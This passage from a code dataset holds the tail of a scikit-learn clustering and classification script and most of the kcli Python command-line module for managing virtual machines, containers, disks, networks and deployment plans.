X_train, X_test\n\n def lda_compute(self, X_train, X_test, y_train, i):\n #applying LDA\n from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\n lda = LDA(n_components = i)\n X_train = lda.fit_transform(X_train, y_train)\n X_test = lda.transform(X_test)\n\n return X_train, X_test\n\n def scatter_plot(self, X_train, tmp, tmp2):\n #visualizing the training data\n plt.scatter(X_train[:,0], X_train[:,1], marker='.', c='r')\n plt.title('Visualize ' + tmp + ' results (' + tmp2 + ' data)')\n plt.xlabel(tmp + '1')\n plt.ylabel(tmp + '2')\n plt.show()\n\n\n def clustering(self, X, name):\n #Applying K-Means clustering\n from sklearn.cluster import KMeans\n wcss = []\n for i in range(1,12):\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init = 10, random_state=0)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\n\n #visualizing the WCSS curve\n plt.plot(range(1,12), wcss)\n plt.title('The Elbow method (' + name + ' Data)')\n plt.xlabel('# of clusters')\n plt.ylabel('WCSS')\n plt.show()\n\n\n #applying k-means to dataset\n kmeans = KMeans(n_clusters = 11, random_state = 0, init='k-means++', max_iter=300, n_init = 10)\n y_kmeans = kmeans.fit_predict(X)\n\n\n if name != 'Input':\n \t #visualizing the clusters\n \tplt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 20, c = 'red', label = 'Arrays')\n \tplt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 20, c = 'blue', label = 'BitVectors')\n \tplt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 20, c = 'green', label = 'ControlFlow')\n \tplt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 20, c = 'cyan', label = 'ECA')\n \tplt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 20, c = 'magenta', label = 'Floats')\n \tplt.scatter(X[y_kmeans == 5, 0], X[y_kmeans == 5, 1], s = 20, c = 'pink', label = 'Heap')\n \tplt.scatter(X[y_kmeans == 6, 0], X[y_kmeans == 6, 1], s = 20, c = 'orange', label = 'Loops')\n \tplt.scatter(X[y_kmeans == 7, 0], X[y_kmeans == 7, 1], s = 20, c = 'purple', label = 'ProductLines')\n \tplt.scatter(X[y_kmeans == 8, 0], X[y_kmeans == 8, 1], s = 20, c = 'navy', label = 'Recursive')\n \tplt.scatter(X[y_kmeans == 9, 0], X[y_kmeans == 9, 1], s = 20, c = 'lime', label = 'Sequentialized')\n 
\tplt.scatter(X[y_kmeans == 10, 0], X[y_kmeans == 10, 1], s = 20, c = 'yellow', label = 'DeviceDrivers')\n \tplt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], s = 20, c = 'black', label = 'Centroids')\n \t#plt.title(name + ' Cluster')\n \tplt.xlabel(name+'1')\n \tplt.ylabel(name+ '2')\n \tplt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),\n ncol=4, fancybox=True, shadow=True)\n \tplt.show()\n\n\n def logistic_reg(self, X_train, y_train, X_test):\n # Fitting Logistic Regression to the Training set\n from sklearn.linear_model import LogisticRegression\n classifier = LogisticRegression(random_state = 0)\n classifier.fit(X_train, y_train)\n\n # Predicting the Test set results\n pred = classifier.predict(X_test)\n return pred\n\n def rand_forest(self, X_train, y_train, X_test, y_test=None, tmp=None, j=0):\n # Fitting Random Forest Classification to the Training set\n from sklearn.ensemble import RandomForestClassifier\n classifier = RandomForestClassifier(n_estimators = 100, criterion = \"entropy\", random_state = 0)\n classifier.fit(X_train, y_train)\n\n y_pred = classifier.predict(X_test)\n if j == 2:\n self.scatter_plot_dim_red(X_train, y_train, classifier, tmp + ' train set')\n self.scatter_plot_dim_red(X_test, y_test, classifier, tmp + ' test set')\n return y_pred\n\n def scatter_plot_dim_red(self, X, Y, classifier, name):\n from matplotlib.colors import ListedColormap\n X_set, y_set = X, Y\n X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),\n np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.75, cmap = ListedColormap(('red', 'green', 'blue','pink','purple','gray', 'yellow', 'cyan', 'orange', 'lightblue','lightgreen')))\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n for i, j in enumerate(np.unique(y_set)):\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n c = ListedColormap(('red', 'green', 'blue','pink','purple','gray', 'yellow', 'cyan', 'orange','lightblue','lightgreen'))(i), label = j)\n plt.title(name)\n plt.xlabel('PC1')\n plt.ylabel('PC2')\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),\n ncol=4, fancybox=True, shadow=True)\n plt.show()\n\n #Backward elimination with P-values and adjusted R-square\n def backwardElimination(self, x, SL, y, m ,n):\n import statsmodels.formula.api as sm\n numVars = len(x[0])\n\n temp = np.zeros((m,n)).astype(int)\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n\n adjR_before = regressor_OLS.rsquared_adj.astype(float)\n if maxVar > SL:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n #print(maxVar, regressor_OLS.pvalues[j].astype(float))\n temp[:,j] = x[:, j]\n x = np.delete(x, j, 1)\n tmp_regressor = sm.OLS(y, x).fit()\n adjR_after = tmp_regressor.rsquared_adj.astype(float)\n if (adjR_before >= adjR_after):\n x_rollback = np.hstack((x, temp[:,[0,j]]))\n x_rollback = np.delete(x_rollback, j, 1)\n print (regressor_OLS.summary())\n return x_rollback\n else:\n continue\n print(regressor_OLS.summary())\n return x\n","sub_path":"scripts/svcomp_predict/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":6987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245134342","text":"#!/usr/bin/env python\n# 
coding=utf-8\n\nfrom distutils.spawn import find_executable\nfrom kvirt.config import Kconfig\nfrom kvirt.baseconfig import Kbaseconfig\nfrom kvirt.containerconfig import Kcontainerconfig\nfrom kvirt.config import __version__\nfrom kvirt.defaults import TEMPLATES\nfrom prettytable import PrettyTable\nimport argparse\nfrom kvirt import common\nfrom kvirt import nameutils\nimport os\nimport random\nimport sys\nimport yaml\n\n\ndef start(args):\n \"\"\"Start vm/container\"\"\"\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Starting container %s...\" % name)\n cont.start_container(name)\n else:\n codes = []\n for name in names:\n common.pprint(\"Starting vm %s...\" % name)\n result = k.start(name)\n code = common.handle_response(result, name, element='', action='started')\n codes.append(code)\n os._exit(1 if 1 in codes else 0)\n\n\ndef stop(args):\n \"\"\"Stop vm/container\"\"\"\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n if config.extraclients:\n ks = config.extraclients\n ks.update({config.client: config.k})\n else:\n ks = {config.client: config.k}\n codes = []\n for cli in ks:\n k = ks[cli]\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Stopping container %s in %s...\" % (name, cli))\n cont.stop_container(name)\n else:\n for name in names:\n common.pprint(\"Stopping vm %s in %s...\" % (name, cli))\n result = k.stop(name)\n code = common.handle_response(result, name, element='', action='stopped')\n codes.append(code)\n os._exit(1 if 1 in codes else 0)\n\n\ndef restart(args):\n \"\"\"Restart vm/container\"\"\"\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Restarting container %s...\" % name)\n cont.stop_container(name)\n cont.start_container(name)\n else:\n codes = []\n for name in names:\n common.pprint(\"Restarting vm %s...\" % name)\n result = k.restart(name)\n code = common.handle_response(result, name, element='', action='restarted')\n codes.append(code)\n os._exit(1 if 1 in codes else 0)\n\n\ndef console(args):\n \"\"\"Vnc/Spice/Serial/Container console\"\"\"\n serial = args.serial\n container = args.container\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n name = common.get_lastvm(config.client) if not args.name else args.name\n k = config.k\n tunnel = config.tunnel\n if container:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n cont.console_container(name)\n return\n elif serial:\n k.serialconsole(name)\n else:\n k.console(name=name, tunnel=tunnel)\n\n\ndef delete(args):\n \"\"\"Delete vm/container\"\"\"\n container = args.container\n template = args.template\n snapshots = args.snapshots\n yes = args.yes\n 
config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if config.extraclients:\n allclients = config.extraclients.copy()\n allclients.update({config.client: config.k})\n names = args.names\n if not names:\n common.pprint(\"Can't delete vms on multiple hosts without specifying their names\", color='red')\n os._exit(1)\n else:\n allclients = {config.client: config.k}\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n for cli in sorted(allclients):\n k = allclients[cli]\n common.pprint(\"Deleting on %s\" % cli)\n if not yes:\n common.confirm(\"Are you sure?\")\n if container:\n codes = [0]\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n for name in names:\n common.pprint(\"Deleting container %s\" % name)\n cont.delete_container(name)\n elif template:\n # k = config.k\n codes = []\n for name in names:\n # shortname = os.path.basename(url)\n # template = os.path.basename(template)\n result = k.delete_image(name)\n if result['result'] == 'success':\n common.pprint(\"%s deleted\" % name)\n codes.append(0)\n else:\n reason = result['reason']\n common.pprint(\"Could not delete %s because %s\" % (name, reason), color='red')\n codes.append(1)\n else:\n codes = []\n for name in names:\n dnsclient, domain = k.dnsinfo(name)\n result = k.delete(name, snapshots=snapshots)\n if result['result'] == 'success':\n common.pprint(\"%s deleted\" % name)\n codes.append(0)\n common.set_lastvm(name, cli, delete=True)\n else:\n reason = result['reason']\n common.pprint(\"Could not delete %s because %s\" % (name, reason), color='red')\n codes.append(1)\n if dnsclient is not None and domain is not None:\n z = Kconfig(client=dnsclient).k\n z.delete_dns(name, domain)\n os._exit(1 if 1 in codes else 0)\n\n\ndef download(args):\n \"\"\"Download Template\"\"\"\n pool = args.pool\n templates = args.templates\n cmd = args.cmd\n url = args.url\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n result = config.handle_host(pool=pool, templates=templates, download=True, cmd=cmd, url=url)\n if result['result'] == 'success':\n os._exit(0)\n else:\n os._exit(1)\n\n\ndef info(args):\n \"\"\"Get info on vm\"\"\"\n output = args.output\n fields = args.fields.split(',') if args.fields is not None else []\n values = args.values\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n for name in names:\n data = k.info(name)\n if data:\n print(common.print_info(data, output=output, fields=fields, values=values, pretty=True))\n\n\ndef host(args):\n \"\"\"Handle host\"\"\"\n enable = args.enable\n disable = args.disable\n sync = args.sync\n if enable:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n result = baseconfig.enable_host(enable)\n elif disable:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n result = baseconfig.disable_host(disable)\n else:\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone,\n namespace=args.namespace)\n result = config.handle_host(sync=sync)\n if result['result'] == 'success':\n os._exit(0)\n else:\n os._exit(1)\n\n\ndef _list(args):\n \"\"\"List hosts, profiles, flavors, templates, isos, pools or vms\"\"\"\n clients = args.clients\n profiles = args.profiles\n flavors = args.flavors\n templates = 
args.templates\n isos = args.isos\n disks = args.disks\n pools = args.pools\n repos = args.repos\n products = args.products\n networks = args.networks\n subnets = args.subnets\n loadbalancers = args.loadbalancers\n containers = args.containers\n images = args.images\n plans = args.plans\n filters = args.filters\n short = args.short\n group = args.group\n repo = args.repo\n if clients:\n clientstable = PrettyTable([\"Client\", \"Type\", \"Enabled\", \"Current\"])\n clientstable.align[\"Client\"] = \"l\"\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n for client in sorted(baseconfig.clients):\n enabled = baseconfig.ini[client].get('enabled', True)\n _type = baseconfig.ini[client].get('type', 'kvm')\n if client == baseconfig.client:\n clientstable.add_row([client, _type, enabled, 'X'])\n else:\n clientstable.add_row([client, _type, enabled, ''])\n print(clientstable)\n return\n if repos:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n repos = PrettyTable([\"Repo\", \"Url\"])\n repos.align[\"Repo\"] = \"l\"\n reposinfo = baseconfig.list_repos()\n for repo in sorted(reposinfo):\n url = reposinfo[repo]\n repos.add_row([repo, url])\n print(repos)\n return\n elif products:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n products = PrettyTable([\"Repo\", \"Group\", \"Product\", \"Description\", \"Numvms\", \"Memory\"])\n products.align[\"Repo\"] = \"l\"\n productsinfo = baseconfig.list_products(group=group, repo=repo)\n for product in sorted(productsinfo, key=lambda x: (x['repo'], x['group'], x['name'])):\n name = product['name']\n repo = product['repo']\n description = product.get('description', 'N/A')\n numvms = product.get('numvms', 'N/A')\n memory = product.get('memory', 'N/A')\n group = product.get('group', 'N/A')\n products.add_row([repo, group, name, description, numvms, memory])\n print(products)\n return\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if config.client != 'all':\n k = config.k\n if pools:\n pools = k.list_pools()\n if short:\n poolstable = PrettyTable([\"Pool\"])\n for pool in sorted(pools):\n poolstable.add_row([pool])\n else:\n poolstable = PrettyTable([\"Pool\", \"Path\"])\n for pool in sorted(pools):\n poolpath = k.get_pool_path(pool)\n poolstable.add_row([pool, poolpath])\n poolstable.align[\"Pool\"] = \"l\"\n print(poolstable)\n return\n if networks:\n networks = k.list_networks()\n common.pprint(\"Listing Networks...\")\n if short:\n networkstable = PrettyTable([\"Network\"])\n for network in sorted(networks):\n networkstable.add_row([network])\n else:\n networkstable = PrettyTable([\"Network\", \"Type\", \"Cidr\", \"Dhcp\", \"Domain\", \"Mode\"])\n for network in sorted(networks):\n networktype = networks[network]['type']\n cidr = networks[network]['cidr']\n dhcp = networks[network]['dhcp']\n mode = networks[network]['mode']\n if 'domain' in networks[network]:\n domain = networks[network]['domain']\n else:\n domain = 'N/A'\n networkstable.add_row([network, networktype, cidr, dhcp, domain, mode])\n networkstable.align[\"Network\"] = \"l\"\n print(networkstable)\n return\n if subnets:\n subnets = k.list_subnets()\n common.pprint(\"Listing Subnets...\")\n if short:\n subnetstable = PrettyTable([\"Subnets\"])\n for subnet in sorted(subnets):\n subnetstable.add_row([subnet])\n else:\n subnetstable = PrettyTable([\"Subnet\", \"Az\", \"Cidr\", \"Network\"])\n for subnet in sorted(subnets):\n cidr = subnets[subnet]['cidr']\n az = 
subnets[subnet]['az']\n if 'network' in subnets[subnet]:\n network = subnets[subnet]['network']\n else:\n network = 'N/A'\n subnetstable.add_row([subnet, az, cidr, network])\n subnetstable.align[\"Network\"] = \"l\"\n print(subnetstable)\n return\n elif profiles:\n if containers:\n profiles = config.list_containerprofiles()\n if short:\n profilestable = PrettyTable([\"Profile\"])\n for profile in sorted(profiles):\n profilename = profile[0]\n profilestable.add_row([profilename])\n else:\n profilestable = PrettyTable([\"Profile\", \"Image\", \"Nets\", \"Ports\", \"Volumes\", \"Cmd\"])\n for profile in sorted(profiles):\n profilestable.add_row(profile)\n profilestable.align[\"Profile\"] = \"l\"\n print(profilestable)\n else:\n profiles = config.list_profiles()\n if short:\n profilestable = PrettyTable([\"Profile\"])\n for profile in sorted(profiles):\n profilename = profile[0]\n profilestable.add_row([profilename])\n else:\n profilestable = PrettyTable([\"Profile\", \"Flavor\",\n \"Pool\", \"Disks\", \"Template\",\n \"Nets\", \"Cloudinit\", \"Nested\",\n \"Reservedns\", \"Reservehost\"])\n for profile in sorted(profiles):\n profilestable.add_row(profile)\n profilestable.align[\"Profile\"] = \"l\"\n print(profilestable)\n return\n elif flavors:\n flavors = k.flavors()\n if short:\n flavorstable = PrettyTable([\"Flavor\"])\n for flavor in sorted(flavors):\n flavorname = profile[0]\n flavorstable.add_row([flavorname])\n else:\n flavorstable = PrettyTable([\"Flavor\", \"Numcpus\", \"Memory\"])\n for flavor in sorted(flavors):\n flavorstable.add_row(flavor)\n flavorstable.align[\"Flavor\"] = \"l\"\n print(flavorstable)\n return\n elif loadbalancers:\n loadbalancers = config.list_loadbalancer()\n if short:\n loadbalancerstable = PrettyTable([\"Loadbalancer\"])\n for lb in sorted(loadbalancers):\n flavorstable.add_row([lb])\n else:\n loadbalancerstable = PrettyTable([\"LoadBalancer\", \"IPAddress\", \"IPProtocol\", \"Ports\", \"Target\"])\n for lb in sorted(loadbalancers):\n loadbalancerstable.add_row(lb)\n loadbalancerstable.align[\"Loadbalancer\"] = \"l\"\n print(loadbalancerstable)\n return\n elif templates:\n templatestable = PrettyTable([\"Template\"])\n templatestable.align[\"Template\"] = \"l\"\n for template in k.volumes():\n templatestable.add_row([template])\n print(templatestable)\n elif isos:\n isostable = PrettyTable([\"Iso\"])\n isostable.align[\"Iso\"] = \"l\"\n for iso in k.volumes(iso=True):\n isostable.add_row([iso])\n print(isostable)\n elif disks:\n common.pprint(\"Listing disks...\")\n diskstable = PrettyTable([\"Name\", \"Pool\", \"Path\"])\n diskstable.align[\"Name\"] = \"l\"\n disks = k.list_disks()\n for disk in sorted(disks):\n path = disks[disk]['path']\n pool = disks[disk]['pool']\n diskstable.add_row([disk, pool, path])\n print(diskstable)\n elif containers:\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n common.pprint(\"Listing containers...\")\n containers = PrettyTable([\"Name\", \"Status\", \"Image\", \"Plan\", \"Command\", \"Ports\", \"Deploy\"])\n for container in cont.list_containers():\n if filters:\n status = container[1]\n if status == filters:\n containers.add_row(container)\n else:\n containers.add_row(container)\n print(containers)\n elif images:\n if config.type != 'kvm':\n common.pprint(\"Operation not supported on this kind of client.Leaving...\", color='red')\n os._exit(1)\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n common.pprint(\"Listing images...\")\n images = PrettyTable([\"Name\"])\n for image in 
cont.list_images():\n images.add_row([image])\n print(images)\n elif plans:\n vms = {}\n if config.extraclients:\n plans = PrettyTable([\"Name\", \"Host\", \"Vms\"])\n allclients = config.extraclients.copy()\n allclients.update({config.client: config.k})\n for cli in sorted(allclients):\n currentconfig = Kconfig(client=cli, debug=args.debug, region=args.region, zone=args.zone,\n namespace=args.namespace)\n for plan in currentconfig.list_plans():\n planname = plan[0]\n planvms = plan[1]\n plans.add_row([planname, cli, planvms])\n else:\n plans = PrettyTable([\"Name\", \"Vms\"])\n for plan in config.list_plans():\n planname = plan[0]\n planvms = plan[1]\n plans.add_row([planname, planvms])\n print(plans)\n else:\n customcolumns = {'kubevirt': 'Namespace', 'aws': 'InstanceId', 'openstack': 'Project'}\n customcolumn = customcolumns[config.type] if config.type in customcolumns else 'Report'\n if config.extraclients:\n allclients = config.extraclients.copy()\n allclients.update({config.client: config.k})\n vms = PrettyTable([\"Name\", \"Host\", \"Status\", \"Ips\", \"Source\", \"Plan\", \"Profile\", customcolumn])\n for cli in sorted(allclients):\n for vm in allclients[cli].list():\n name = vm.get('name')\n status = vm.get('status')\n ip = vm.get('ip', '')\n source = vm.get('template', '')\n plan = vm.get('plan', '')\n profile = vm.get('profile', '')\n report = vm.get('report', '')\n vminfo = [name, cli, status, ip, source, plan, profile, report]\n if filters:\n if status == filters:\n vms.add_row(vminfo)\n else:\n vms.add_row(vminfo)\n print(vms)\n else:\n vms = PrettyTable([\"Name\", \"Status\", \"Ips\", \"Source\", \"Plan\", \"Profile\", customcolumn])\n for vm in k.list():\n name = vm.get('name')\n status = vm.get('status')\n ip = vm.get('ip', '')\n source = vm.get('template', '')\n plan = vm.get('plan', '')\n profile = vm.get('profile', '')\n report = vm.get('report', '')\n vminfo = [name, status, ip, source, plan, profile, report]\n if config.planview and vm[4] != config.currentplan:\n continue\n if filters:\n if status == filters:\n vms.add_row(vminfo)\n else:\n vms.add_row(vminfo)\n print(vms)\n return\n\n\ndef vm(args):\n \"\"\"Create vms\"\"\"\n name = args.name\n profile = args.profile\n profilefile = args.profilefile\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if 'name' in overrides:\n name = overrides['name']\n if name is None:\n name = nameutils.get_random_name()\n if config.type in ['gcp', 'kubevirt']:\n name = name.replace('_', '-')\n if config.type != 'aws':\n common.pprint(\"Using %s as name of the vm\" % name)\n if profile is not None and profile.endswith('.yml'):\n profilefile = profile\n profile = None\n if profilefile is not None:\n if not os.path.exists(profilefile):\n common.pprint(\"Missing profile file\", color='red')\n os._exit(1)\n else:\n with open(profilefile, 'r') as entries:\n config.profiles = yaml.safe_load(entries)\n if profile is None:\n if len(config.profiles) == 1:\n profile = list(config.profiles)[0]\n else:\n common.pprint(\"Missing profile\", color='red')\n os._exit(1)\n result = config.create_vm(name, profile, overrides=overrides)\n code = common.handle_response(result, name, element='', action='created', client=config.client)\n return code\n\n\ndef clone(args):\n \"\"\"Clone existing vm\"\"\"\n name = args.name\n base = args.base\n full = args.full\n start = args.start\n common.pprint(\"Cloning vm %s 
from vm %s...\" % (name, base))\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n k.clone(base, name, full=full, start=start)\n\n\ndef update(args):\n \"\"\"Update ip, memory or numcpus\"\"\"\n ip1 = args.ip1\n flavor = args.flavor\n numcpus = args.numcpus\n memory = args.memory\n plan = args.plan\n autostart = args.autostart\n noautostart = args.noautostart\n dns = args.dns\n host = args.host\n domain = args.domain\n cloudinit = args.cloudinit\n template = args.template\n net = args.network\n information = args.information\n iso = args.iso\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n for name in names:\n if dns:\n common.pprint(\"Creating Dns entry for %s...\" % name)\n if net is not None:\n nets = [net]\n else:\n nets = k.vm_ports(name)\n if nets and domain is None:\n domain = nets[0]\n if not nets:\n return\n else:\n k.reserve_dns(name=name, nets=nets, domain=domain, ip=ip1)\n elif ip1 is not None:\n common.pprint(\"Updating ip of vm %s to %s...\" % (name, ip1))\n k.update_metadata(name, 'ip', ip1)\n elif cloudinit:\n common.pprint(\"Removing cloudinit information of vm %s\" % name)\n k.remove_cloudinit(name)\n return\n elif plan is not None:\n common.pprint(\"Updating plan of vm %s to %s...\" % (name, plan))\n k.update_metadata(name, 'plan', plan)\n elif template is not None:\n common.pprint(\"Updating template of vm %s to %s...\" % (name, template))\n k.update_metadata(name, 'template', template)\n elif memory is not None:\n common.pprint(\"Updating memory of vm %s to %s...\" % (name, memory))\n k.update_memory(name, memory)\n elif numcpus is not None:\n common.pprint(\"Updating numcpus of vm %s to %s...\" % (name, numcpus))\n k.update_cpus(name, numcpus)\n elif autostart:\n common.pprint(\"Setting autostart for vm %s...\" % name)\n k.update_start(name, start=True)\n elif noautostart:\n common.pprint(\"Removing autostart for vm %s...\" % name)\n k.update_start(name, start=False)\n elif information:\n common.pprint(\"Setting information for vm %s...\" % name)\n k.update_information(name, information)\n elif iso is not None:\n common.pprint(\"Switching iso for vm %s to %s...\" % (name, iso))\n k.update_iso(name, iso)\n elif flavor is not None:\n common.pprint(\"Updating flavor of vm %s to %s...\" % (name, flavor))\n k.update_flavor(name, flavor)\n elif host:\n common.pprint(\"Creating Host entry for vm %s...\" % name)\n nets = k.vm_ports(name)\n if not nets:\n return\n if domain is None:\n domain = nets[0]\n k.reserve_host(name, nets, domain)\n\n\ndef disk(args):\n \"\"\"Add/Delete disk of vm\"\"\"\n name = args.name\n delete = args.delete\n size = args.size\n diskname = args.diskname\n template = args.template\n pool = args.pool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n if diskname is None:\n common.pprint(\"Missing diskname. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Deleting disk %s\" % diskname)\n k.delete_disk(name=name, diskname=diskname, pool=pool)\n return\n if size is None:\n common.pprint(\"Missing size. Leaving...\", color='red')\n os._exit(1)\n if pool is None:\n common.pprint(\"Missing pool. Leaving...\", color='red')\n os._exit(1)\n if name is None:\n common.pprint(\"Missing name. 
Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding disk to %s...\" % name)\n k.add_disk(name=name, size=size, pool=pool, template=template)\n\n\ndef dns(args):\n \"\"\"Create/Delete dns entries\"\"\"\n delete = args.delete\n name = args.name\n net = args.net\n domain = net\n ip = args.ip\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n common.pprint(\"Deleting Dns entry for %s...\" % name)\n k.delete_dns(name, domain)\n else:\n common.pprint(\"Creating Dns entry for %s...\" % name)\n k.reserve_dns(name=name, nets=[net], domain=domain, ip=ip)\n\n\ndef export(args):\n \"\"\"Export a vm\"\"\"\n template = args.template\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n k = config.k\n codes = []\n for name in names:\n result = k.export(name=name, template=template)\n if result['result'] == 'success':\n common.pprint(\"Exporting vm %s\" % name)\n codes.append(0)\n else:\n reason = result['reason']\n common.pprint(\"Could not delete vm %s because %s\" % (name, reason), color='red')\n codes.append(1)\n os._exit(1 if 1 in codes else 0)\n\n\ndef lb(args):\n \"\"\"Create/Delete loadbalancer\"\"\"\n checkpath = args.checkpath\n checkport = args.checkport\n yes = args.yes\n delete = args.delete\n ports = args.ports\n domain = args.domain\n internal = args.internal\n vms = args.vms.split(',') if args.vms is not None else []\n ports = args.ports.split(',') if args.ports is not None else []\n name = nameutils.get_random_name().replace('_', '-') if args.name is None else args.name\n if delete and not yes:\n common.confirm(\"Are you sure?\")\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n config.handle_loadbalancer(name, ports=ports, checkpath=checkpath, vms=vms, delete=delete, domain=domain,\n checkport=checkport, internal=internal)\n return 0\n\n\ndef nic(args):\n \"\"\"Add/Delete nic of vm\"\"\"\n name = args.name\n delete = args.delete\n interface = args.interface\n network = args.network\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n common.pprint(\"Deleting nic from %s...\" % name)\n k.delete_nic(name, interface)\n return\n if network is None:\n common.pprint(\"Missing network. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding Nic %s...\" % name)\n k.add_nic(name=name, network=network)\n\n\ndef pool(args):\n \"\"\"Create/Delete pool\"\"\"\n pool = args.pool\n delete = args.delete\n full = args.delete\n pooltype = args.pooltype\n path = args.path\n thinpool = args.thinpool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if delete:\n common.pprint(\"Deleting pool %s...\" % pool)\n k.delete_pool(name=pool, full=full)\n return\n if path is None:\n common.pprint(\"Missing path. 
Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding pool %s...\" % pool)\n k.create_pool(name=pool, poolpath=path, pooltype=pooltype, thinpool=thinpool)\n\n\ndef plan(args):\n \"\"\"Create/Delete/Stop/Start vms from plan file\"\"\"\n plan = args.plan\n ansible = args.ansible\n url = args.url\n path = args.path\n autostart = args.autostart\n noautostart = args.noautostart\n container = args.container\n inputfile = args.inputfile\n revert = args.revert\n snapshot = args.snapshot\n start = args.start\n stop = args.stop\n restart = args.restart\n delete = args.delete\n delay = args.delay\n yes = args.yes\n info = args.info\n update = args.update\n volumepath = args.volumepath\n paramfile = args.paramfile\n if os.path.exists(\"/i_am_a_container\"):\n inputfile = \"%s/%s\" % (volumepath, inputfile) if inputfile is not None else \"%s/kcli_plan.yml\" % volumepath\n if paramfile is not None:\n paramfile = \"%s/%s\" % (volumepath, paramfile)\n overrides = common.get_overrides(paramfile=paramfile, param=args.param)\n if info and url is None:\n inputfile = plan if inputfile is None and plan is not None else inputfile\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n baseconfig.info_plan(inputfile)\n os._exit(0)\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n if plan is None:\n plan = nameutils.get_random_name()\n common.pprint(\"Using %s as name of the plan\" % plan)\n if delete and not yes:\n common.confirm(\"Are you sure?\")\n config.plan(plan, ansible=ansible, url=url, path=path, autostart=autostart,\n container=container, noautostart=noautostart, inputfile=inputfile,\n start=start, stop=stop, delete=delete, delay=delay, overrides=overrides, info=info, snapshot=snapshot,\n revert=revert, update=update, restart=restart)\n return 0\n\n\ndef repo(args):\n \"\"\"Create/Delete repo\"\"\"\n repo = args.repo\n delete = args.delete\n url = args.url\n update = args.update\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n if update:\n if repo is None:\n common.pprint(\"Updating all repos...\", color='blue')\n repos = baseconfig.list_repos()\n for repo in repos:\n 